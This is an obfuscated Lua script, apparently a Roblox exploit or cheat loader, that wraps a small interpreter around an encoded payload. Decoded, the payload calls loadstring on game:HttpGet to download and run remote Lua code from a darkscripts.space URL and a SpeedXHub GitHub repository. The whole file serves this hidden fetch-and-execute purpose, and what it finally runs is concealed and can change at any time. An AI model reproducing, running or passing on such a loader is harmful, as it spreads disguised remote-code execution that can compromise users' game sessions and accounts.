--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-((1 + 0) -(877 -(282 + 595)))) -(v32-1)) + 1)) ;return v82-(v82%1) ;else local v83=0 -0 ;local v84;while true do if (v83==(619 -(555 + 64))) then v84=(933 -(857 + 74))^(v32-((2206 -(1523 + 114)) -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(222 + 4 + 1044)) );v18=v18 + 4 ;return (v40 * (73054774 -56277558)) + (v39 * 65536) + (v38 * (373 -(32 + 19 + 66))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=958 -(892 + 65) ;local v44=(v20(v42,2 -1 ,45 -25 ) * ((3 -1)^(58 -26))) + v41 ;local v45=v20(v42,38 -17 ,803 -(201 + 571) );local v46=((v20(v42,382 -(87 + 263) )==(1 -0)) and  -((1319 -(116 + 1022)) -((278 -211) + 113))) or (1 + 0) ;if (v45==((0 + 0) -0)) then if (v44==(0 + (0 -0))) then return v46 * (0 -0) ;else local v89=952 -(802 + 150) ;while true do if (v89==(0 -0)) then v45=1 -0 ;v43=0 -(0 -0) ;break;end end end elseif (v45==(1490 + 557)) then return ((v44==(997 -(915 + 82))) and (v46 * ((2 -1)/(1486 -(998 + 488))))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((2 + 0)^(43 + 9)))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(859 -(814 + 45))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(2 -1) );v18=v18 + v47 ;local v49={};for v64=1, #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return 0;end)();local v51=(function() return;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do local v66=(function() return 0;end)();while true do if ((0 -0)~=v66) then else if (v50==(1785 -(599 + 1185))) then local v94=(function() return 0 + 0 ;end)();local v95=(function() return;end)();while true do if (v94==0) then v95=(function() return 0;end)();while true do if (v95==(0 + 0)) then local v122=(function() return 0;end)();while true do if ((574 -(507 + 67))==v122) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v122=(function() return 1;end)();end if ((1 + 0)==v122) then v95=(function() return 2 -1 ;end)();break;end end end if (v95==1) then v56=(function() return v23();end)();v50=(function() return 7 -5 ;end)();break;end end break;end end end if (v50~=(867 -(550 + 317))) then else local v96=(function() return 0 -0 ;end)();while true do if (v96~=(1 -0)) then else v53=(function() return {};end)();v50=(function() return 1;end)();break;end if (v96==(0 -0)) then v51=(function() return function(v115,v116,v117) local v118=(function() return 0;end)();local v119=(function() return;end)();while true do if (v118~=(285 -(134 + 151))) then else v119=(function() return 1665 -(970 + 695) ;end)();while true do if (v119~=0) then else local v179=(function() return 0 -0 ;end)();while true do if ((1990 -(582 + 1408))~=v179) then else v115[v116-#"," ]=(function() return v117();end)();return v115,v116,v117;end end end end break;end end end;end)();v52=(function() return {};end)();v96=(function() return 1;end)();end end end v66=(function() return 1;end)();end if (v66==1) then if (v50~=3) then else for v99= #"~",v23() do local v100=(function() return v21();end)();if (v20(v100, #".", #"~")==0) then local v102=(function() return 0;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v102~=3) then else if (v20(v104, #"xnx", #"nil")~= #"}") then else v105[ #"?id="]=(function() return v57[v105[ #".com"]];end)();end v52[v99]=(function() return v105;end)();break;end if (v102~=(0 -0)) then else local v124=(function() return 0;end)();while true do if (v124~=(1 -0)) then else v102=(function() return 1;end)();break;end if (v124~=0) then else v103=(function() return v20(v100,2, #"asd");end)();v104=(function() return v20(v100, #"xnxx",6);end)();v124=(function() return 3 -2 ;end)();end end end if (v102~=(1826 -(1195 + 629))) then else if (v20(v104, #"}", #",")~= #"\\") then else v105[2]=(function() return v57[v105[2 -0 ]];end)();end if (v20(v104,243 -(187 + 54) ,2)~= #"{") then else v105[ #"19("]=(function() return v57[v105[ #"xxx"]];end)();end v102=(function() return 3;end)();end if (v102~=(781 -(162 + 618))) then else v105=(function() return {v22(),v22(),nil,nil};end)();if (v103==(0 + 0)) then local v169=(function() return 0 + 0 ;end)();while true do if (v169==(0 -0)) then v105[ #"xxx"]=(function() return v22();end)();v105[ #"asd1"]=(function() return v22();end)();break;end end elseif (v103== #"{") then v105[ #"xxx"]=(function() return v23();end)();elseif (v103==(2 -0)) then v105[ #"xnx"]=(function() return v23() -(2^(2 + 14)) ;end)();elseif (v103~= #"-19") then else local v185=(function() return 1636 -(1373 + 263) ;end)();local v186=(function() return;end)();while true do if (v185==(1000 -(451 + 549))) then v186=(function() return 0;end)();while true do if (v186==0) then v105[ #"19("]=(function() return v23() -((1 + 1)^(24 -8)) ;end)();v105[ #"0836"]=(function() return v22();end)();break;end end break;end end end v102=(function() return 2 -0 ;end)();end end end end for v101= #"|",v23() do v53,v101,v28=(function() return v51(v53,v101,v28);end)();end return v55;end if (v50==(1386 -(746 + 638))) then local v97=(function() return 0;end)();local v98=(function() return;end)();while true do if ((0 + 0)==v97) then v98=(function() return 0 -0 ;end)();while true do if (v98~=(342 -(218 + 123))) then else v55[ #"-19"]=(function() return v21();end)();v50=(function() return 1584 -(1535 + 46) ;end)();break;end if (v98~=0) then else v57=(function() return {};end)();for v152= #"!",v56 do local v153=(function() return 0;end)();local v154=(function() return;end)();local v155=(function() return;end)();local v156=(function() return;end)();while true do if (v153==(0 + 0)) then v154=(function() return 0 + 0 ;end)();v155=(function() return nil;end)();v153=(function() return 1;end)();end if (v153~=(561 -(306 + 254))) then else v156=(function() return nil;end)();while true do if ((0 + 0)==v154) then v155=(function() return v21();end)();v156=(function() return nil;end)();v154=(function() return 1 -0 ;end)();end if (v154~=(1468 -(899 + 568))) then else if (v155== #",") then v156=(function() return v21()~=(0 + 0) ;end)();elseif (v155==2) then v156=(function() return v24();end)();elseif (v155~= #"asd") then else v156=(function() return v25();end)();end v57[v152]=(function() return v156;end)();break;end end break;end end end v98=(function() return 1;end)();end end break;end end end break;end end end end local function v29(v58,v59,v60) local v61=v58[2 -1 ];local v62=v58[2];local v63=v58[606 -(268 + 335) ];return function(...) local v67=v61;local v68=v62;local v69=v63;local v70=v27;local v71=291 -(60 + 230) ;local v72= -(573 -(426 + 146));local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=1456 -(282 + (1579 -(118 + 287))) ,v75 do if ((v85>=v69) or (1263>2229)) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + ((3182 -2370) -(569 + 242)) ];end end local v78=(v75-v69) + (2 -1) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if ((2253==2253) and (v80<=((754 -(239 + 514)) + 9))) then if ((452==452) and (v80<=((362 + 666) -(706 + 318)))) then if (v80<=((2581 -(797 + 532)) -(721 + 530))) then if ((v80>(1271 -((2066 -(118 + 1003)) + 326))) or (4557<2087)) then do return;end else v77[v79[4 -2 ]]=v79[3 + 0 ];end elseif (v80<=(5 -3)) then if (v77[v79[702 -(197 + 74 + 429) ]]==v79[4 + (377 -(142 + 235)) ]) then v71=v71 + 1 + 0 ;else v71=v79[1503 -(1408 + 92) ];end elseif (v80>((2560 -1471) -(461 + 625))) then v77[v79[1290 -(993 + 295) ]]=v60[v79[(4 -3) + 2 ]];else v77[v79[1173 -(418 + 753) ]]=v79[2 + (1203 -(373 + 829)) ]~=0 ;end elseif ((3874==3874) and (v80<=(2 + 5))) then if (v80<=(982 -(553 + 424))) then v77[v79[2]]();elseif ((v80==(10 -4)) or (1938>4935)) then v71=v79[1 + 2 ];else v77[v79[1 + 1 ]]();end elseif ((v80<=(3 + 5)) or (4255<3423)) then for v120=v79[531 -(406 + 123) ],v79[(1561 + 211) -(1749 + 20) ] do v77[v120]=nil;end elseif (v80>(6 + 3)) then local v131=0;local v132;local v133;local v134;local v135;while true do if (v131==(1 + 1)) then for v174=v132,v72 do v135=v135 + (1323 -(1249 + 73)) ;v77[v174]=v133[v135];end break;end if ((1454<=2491) and (v131==(0 + 0))) then v132=v79[1 + 1 + 0 ];v133,v134=v70(v77[v132](v13(v77,v132 + (1146 -(466 + 679)) ,v79[6 -3 ])));v131=2 -1 ;end if ((1901 -(106 + 1794))==v131) then v72=(v134 + v132) -(1 + 0 + 0) ;v135=0;v131=1 + 1 ;end end else local v136=v79[5 -3 ];v77[v136]=v77[v136](v13(v77,v136 + (2 -1) ,v72));end elseif (v80<=((74 + 55) -(4 + 110))) then if ((v80<=(596 -(57 + 527))) or (4157<=2803)) then if (v80==((3117 -1679) -(41 + (2517 -1131)))) then if ((4853>=2982) and (v77[v79[105 -(17 + 86) ]]==v79[3 + 1 ])) then v71=v71 + (1 -(0 -0)) ;else v71=v79[8 -5 ];end else local v108=0;local v109;local v110;while true do if (v108==1) then v77[v109 + 1 ]=v110;v77[v109]=v110[v79[170 -(122 + 44) ]];break;end if ((4134>3357) and (0==v108)) then v109=v79[2 -0 ];v110=v77[v79[9 -6 ]];v108=1 + 0 ;end end end elseif (v80<=((240 -(64 + 174)) + 2 + 9)) then v77[v79[3 -1 ]]=v60[v79[68 -(30 + 35) ]];elseif ((v80>(10 + (5 -1))) or (3417<2534)) then v77[v79[5 -3 ]]=v79[(1596 -(144 + 192)) -(1043 + 214) ];else local v141=v79[2];local v142,v143=v70(v77[v141](v13(v77,v141 + (2 -1) ,v79[11 -8 ])));v72=(v143 + v141) -((353 + 860) -(323 + 889)) ;local v144=(0 -0) -0 ;for v162=v141,v72 do local v163=580 -(361 + 219) ;while true do if (v163==(216 -(42 + 174))) then v144=v144 + (321 -(53 + 267)) ;v77[v162]=v142[v144];break;end end end end elseif (v80<=(5 + 10 + 3)) then if (v80<=(429 -(15 + 398))) then v77[v79[984 -(18 + 964) ]]=v79[(10 + 1) -(4 + 4) ]~=(0 + 0) ;elseif ((v80==(11 + 6)) or (2722<=164)) then local v145=v79[852 -(20 + 830) ];local v146=v77[v79[3 + 0 ]];v77[v145 + ((1631 -(363 + 1141)) -(116 + 10)) ]=v146;v77[v145]=v146[v79[(1581 -(1183 + 397)) + 3 ]];else for v164=v79[(2252 -1512) -(542 + 196) ],v79[3] do v77[v164]=nil;end end elseif (v80<=(40 -21)) then v71=v79[1 + 2 ];elseif (v80==(11 + 9)) then local v150=0;local v151;while true do if ((0 + 0)==v150) then v151=v79[4 -2 ];v77[v151]=v77[v151](v13(v77,v151 + (2 -1) ,v72));break;end end else do return;end end v71=v71 + (1552 -(1126 + 425)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F652Q3761633634372D643766352D343265302D396263392D6431653966366463663130655F39332Q3633303134393735383231343239362E6C756103473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F53702Q6564584875622F50732Q39747273632F726566732F68656164732F6D61696E2F4767001B3Q00124Q00014Q0012000100013Q0026023Q0002000100010004063Q0002000100122Q000100013Q00260200010005000100010004063Q0005000100120D000200023Q00120D000300033Q00201100030003000400122Q000500054Q0010000600014Q000E000300064Q000900023Q00022Q000500020001000100120D000200023Q00120D000300033Q00201100030003000400122Q000500064Q000E000300054Q000900023Q00022Q00050002000100010004063Q001A00010004063Q000500010004063Q001A00010004063Q000200012Q00153Q00017Q00",v9(),...);
